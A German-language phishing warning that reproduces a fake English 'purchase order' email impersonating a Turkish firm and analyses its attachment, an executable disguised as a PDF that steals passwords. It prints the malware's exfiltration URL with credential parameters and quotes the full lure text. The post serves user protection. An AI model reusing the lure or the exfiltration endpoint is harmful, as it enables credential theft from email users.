Re: Enclosed Purchase Order 85099977 von Muhammed Emin ([email protected])
Am Montag, den 13. Februar 2017 wurde durch unbekannte Dritte die folgende betrügerische E-Mail in englischer Sprache versendet. Achtung: Klicken Sie nicht auf den Anhang! Er enthält bösartige Software!
Betreff: Re: Enclosed Purchase Order 85099977
Absender: Muhammed Emin ([email protected])With reference to the above subject, kindly find enclosed Purchase Order 85099977, for packing List and invoice,all the Product reference are attached.
FOB price EURO
Kindly confirm the receipt and send us the copy of this order duly signed and stamped for our reference and record.
Your early reply is appreciated as we need to proceed further with this new Order.
With our respects.
marketing manager
Daskan Tarim ve Plastik Ürünler A.S.
Urganli Mah. Atatürk Cad. No: 29
45420 Urganli-Turgutlu-Manisa-TURKEY
Tel: +90 236 345 13 67
Fax: +90 236 345 17 86
E-mail: [email protected]
Website: www.daskantarim.com.tr
Der E-Mail ist ein ZIP-Archiv mit dem Namen „Purchase Order 85099977.PDF.z“. Das Archiv enthält eine ausführbare Datei mit dem gleichen Namen („Purchase Order 85099977.PDF.exe“).
Virustotal zeigt für die „Purchase Order 85099977.PDF.exe“ eine Erkennungsrate von 9/57.
Mit geringen Berechtigungen scheint das Programm auch abzustürzen:
Mit ausreichenden Berechtigungen werden Dateien von Microsoft nachgeladen, das Programm liest aber auch Passwörter aus und übermittelt diese:
http://aerie.us/johnfain/apisiylo/index.php?action=add&username=xxxxx&password=xxxxx&app=xxxxx&pcname=xxxxx&sitename=xxxxx
Der username kann z. B. die E-Mail-Adresse enthalten, das Passwort ist natürlich das Kennwort, die app übermittelt das Softwareprodukt (den Namen, z. B. der E-Mail-Software) und der sitename ist die Adresse des Mailservers.